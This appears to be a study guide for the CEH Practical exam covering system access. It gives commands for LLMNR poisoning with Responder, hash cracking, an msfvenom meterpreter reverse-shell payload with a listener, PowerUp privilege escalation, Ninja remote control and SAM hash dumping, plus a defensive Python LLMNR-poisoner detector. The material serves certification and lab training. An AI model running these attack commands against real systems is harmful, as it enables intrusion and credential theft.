CEH Practical Guide

1. Gain access to the system

Last updated 7 months ago

1. Perform Active Online Attack to Crack the System’s Password using Responder

LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are used to perform name resolution on the local link.

Responder is an LLMNR, NBT-NS and MDNS poisoner. By default the tool only responds to SMB.

Check the interfaces:

ifconfig

Now run responder on the interface.

sudo responder -I ens33

Now when a user on the LAN tries to access an unavailable share, Responder will capture the hash.

Logs are stored in the /usr/share/responder folder. We will have a hash there; now crack it with John.

On Ubuntu you can install John as:

sudo snap install john-the-ripper
sudo john /home/ubuntu/Responder/logs/SMB-NTLMv2-SSP-10.10.10.10.txt
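
The same behaviour gives defenders a simple check: ask the link for a random name that cannot exist, and treat any LLMNR answer as a poisoner. This is an added example, not part of the original guide; the function names and the canary- name prefix are assumptions, and it covers LLMNR over IPv4 only (not NBT-NS or MDNS).

```python
import secrets, socket, struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355  # LLMNR multicast group, UDP 5355

def build_query(name, txid):
    """LLMNR query (DNS wire format) asking for the A record of a one-label name."""
    label = name.encode("ascii")
    return (struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0)
            + bytes([len(label)]) + label + b"\x00" + struct.pack(">HH", 1, 1))

def skip_name(pkt, off):
    """Return the offset just past a name, which may end in a compression pointer."""
    while pkt[off] != 0:
        if pkt[off] & 0xC0 == 0xC0:
            return off + 2
        off += 1 + pkt[off]
    return off + 1

def answer_ips(pkt, txid):
    """IPv4 addresses answered for our transaction id; [] if the packet is not one."""
    ips = []
    try:
        rid, flags, qd, an = struct.unpack(">HHHH", pkt[:8])
        if rid != txid or not flags & 0x8000:  # must be a response to our query
            return []
        off = 12
        for _ in range(qd):
            off = skip_name(pkt, off) + 4      # name + QTYPE + QCLASS
        for _ in range(an):
            off = skip_name(pkt, off)
            rtype, _, _, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
            if rtype == 1 and rdlen == 4:      # A record with an IPv4 address
                ips.append(socket.inet_ntoa(pkt[off + 10:off + 14]))
            off += 10 + rdlen
    except (IndexError, OSError, struct.error):
        return []                              # truncated or malformed packet
    return ips

def probe(timeout=2.0):
    """Query a random name nobody owns; the first host that answers is suspect."""
    name, txid = "canary-" + secrets.token_hex(6), secrets.randbelow(65536)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        try:
            data, (src, _port) = sock.recvfrom(512)
        except socket.timeout:
            return []                          # silence is the healthy result
    return [(src, ip) for ip in answer_ips(data, txid)]
```

Call probe() on a schedule from a host on the monitored segment; a non-empty result gives the answering source address and the address it claimed for the canary name.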

2. Audit system passwords using L0phtCrack

Windows tool. It can crack other passwords on a remote machine over SMB if you know a single account. Use the password auditing wizard.

3. Find Vulnerabilities on exploit sites

4. Gain Access to a Remote System using Reverse Shell Generator

Create the msfvenom payload:

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x64 LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.ex

Use Apache to transfer the file:

mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
service apache2 start

Now run msfconsole

msfconsole
use exploit/multi/handler

Set the payload type, port and IP, and visit the IP to download the executable. Run it and you will get the shell.

You can run the following commands in meterpreter.

sysinfo  //get system information

Upload a file through meterpreter.

The PowerSploit privilege escalation script is under /usr/share/windows-resources/powersploit.

upload PowerUp.ps1 powerup.ps1

Now get shell

shell

Now execute the script

powershell -ExecutionPolicy bypass -command ". .\powerup.ps1;Invoke-AllChecks"

Now exit the shell. To get a VNC session from meterpreter, use the following command.

run vnc

5. Gain access to a system using Armitage

GUI-based msf.

service postgresql start

Now run Armitage from the Applications menu. Run an intense scan, and then we can create a payload according to our target.

Once the victim opens the payload, we get the session.

6. Gain access to system using Ninja Jonin

Ninja is installed on the target and Jonin on the attacker machine.

We need to edit its config file to change the IP and port.

Open the Jonin listener. It will catch the sessions.

list  //to list all sessions
connect 1 //to connect to session
//to get to cmd
change
cmd
help //displays help

7. Buffer Overflow

Tools required

8. System Password hacking

# To Dump Windows SAM file hashes
pwDump7.exe > hashes.txt
L0phtCrack
Offensive Security's Exploit Database Archive
Online - Reverse Shell Generator
Also try different shells from rev shells
GitHub - ErAz7/Ninja: A general-purpose fully customizable software to control a remote computer behind any NAT, Firewall and proxy. Providing secure shell access, file transfer and shell stream (stream shell output from remote to a local file). Ninja has no prerequisites, you can just download the release and use it right away!
Simple Stack Based Buffer Overflow Tutorial for Vulnserver · The Grey Corner
Buffer Overflow | Pentesting Quick Reference OSCP and Beyond
Follow the detailed tutorial
GitHub - stephenbradshaw/vulnserver: Vulnerable server used for learning software exploitation
https://debugger.immunityinc.com/
Certified Ethical Hacker (CEHv12) Practical hands on Labs (Udemy)
CEH Practical Course
LLMNR is layer 2 UDP 5355. NetBIOS-NS is port 137.